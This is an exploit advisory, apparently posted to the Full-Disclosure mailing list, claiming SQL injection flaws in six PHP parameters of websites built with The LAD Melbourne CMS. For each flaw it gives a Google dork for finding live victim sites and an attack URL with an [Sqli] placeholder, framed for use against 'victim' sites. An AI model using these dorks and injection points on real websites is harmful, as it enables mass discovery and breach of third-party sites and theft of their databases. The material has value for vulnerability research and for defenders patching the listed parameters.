.__.__ .__ __ |__| | _____ __ __| |__ _____ ____ | | __ ___________ | | | / \| | \ | \\__ \ _/ ___\| |/ // __ \_ __ \ | | |_| Y Y \ | / Y \/ __ \\ \___| <\ ___/| | \/ |__|____/__|_| /____/|___| (____ /\___ >__|_ \\___ >__| \/ \/ \/ \/ \/ \/ .org ################################ Archieve an Resource About Hacking ############### #################### #################### # # Exploit Title: The LAD Melbourne Cms Sql Injection Vulnerability # Author: Netrondoank Aka netron # home Page: http://www.ilmuhacker.org # Forum : http://www.indonesiansecurity.info # Vendor or Software Link: http://www.thelad.com.au # Version: N/A # Category:: webapps # Google dork: "Web design by The LAD Melbourne." # Tested on: Linux Back Track 5 #################################################################### # Vuln. File: [product_details.php?id] [product_items.php?pid=] [items.php?pid] [product_generic.php?cid] [catalogue.php?cid] [categories.php?cat] #################################################################### # Proof Of Concept [POC] Dork : "Web design by The LAD Melbourne." "inurl:product_details.php?id=" Exploite: www.victim.com/product_details.php?id=[Sqli] ############################################################################ ######################################################################################### Dork : "Web design by The LAD Melbourne." "inurl:product_items.php?pid=" Exploite: www.victim.com/product_items.php?pid=[Sqli] ############################################################################ ######################################################################################### Dork : "Web design by The LAD Melbourne." "inurl:items.php?pid=" Exploite: www.victim.com/items.php?pid=[Sqli] ############################################################################ ######################################################################################### #Dork : "Web design by The LAD Melbourne." "inurl:product_generic.php?cid=" #Exploite: www.victim.com/product_generic.php?cid=[Sqli] ############################################################################ ######################################################################################### #Dork : "Web design by The LAD Melbourne." "inurl:catalogue.php?cid=" #Exploite: www.victim.com/catalogue.php?cid=[Sqli] ############################################################################ ######################################################################################### #Dork : "Web design by The LAD Melbourne." "inurl:categories.php?cat=" #Exploite: www.victim.com/categories.php?cat=[Sqli] ######## EOF ########### EOF ##################### EOF############ EOF ###### #######################################END OF POC########################### #Greetz To: Allah swt .free dom For Palestine .Indonesiansecurity.info, 1337day.com packetstormsecurity.org, Exploit-id.com ,securityreason.com ,securityfocus.com ########################################################################################## ############################### Archieve an Resource About Hacking--Ilmuhackerdotorg ####
Attachment:
The
Description: Binary data
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/